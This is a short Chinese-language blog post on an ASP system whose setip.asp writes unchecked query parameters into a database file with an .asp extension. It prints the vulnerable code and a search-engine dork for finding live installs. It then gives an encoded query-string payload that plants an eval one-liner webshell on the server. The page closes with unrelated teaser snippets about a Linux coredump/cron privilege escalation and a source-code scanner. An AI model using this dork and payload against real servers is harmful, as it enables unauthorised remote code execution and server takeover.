toby57
在預設的情況下,利用該漏洞可得到上線系統所在伺服器的webshell
asp上線系統中儲存上線ip資訊的資料庫的副檔名預設為asp
寫入配置時對引數未作檢查,setip.asp相關**
<%
strip=trim(request.querystring("ip"))
strport=trim(request.querystring("port"))
strtype=trim(request.querystring("type"))
if strtype="0" then
strip=request.servervariables("remote_host")
end if
sql="select * from info where strmark='main'"
rs.open sql,conn,1,3
if not rs.eof or not rs.bof then
rs("stripaddress")=strip
rs("strport")=strport
rs("strtype")=strtype
rs.update
'不要修改下面的反饋字元.否則程式不知道是否更新成功.
response.write "update success!"
else
response.write "update fail!"
end if
set rs=nothing
conn.close
set conn=nothing
以「inurl:setip.asp」為關鍵字找了乙個測試位址 提交
?type=%a9%e0%b0y%ce%db%a0%84%9f%a8%94%b3%ac%9b%a1%c5%a1%d4%a9%cd%90%f7
這樣就插入了eval一句話
ipdat.asp
linux乙個漏洞的分析
程式最早是國外的大佬寫的。這個漏洞的原理非常簡單,就是利用coredump的時候,可以在 etc cron.d目錄下生成core檔案。而在 etc cron.d目錄下的檔案,crontab會定時以指定的使用者許可權來執行。如果在core檔案中,指定使用者許可權是root,那麼 就能夠以我們希望的方式...
乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 2
主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...
乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 續
主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...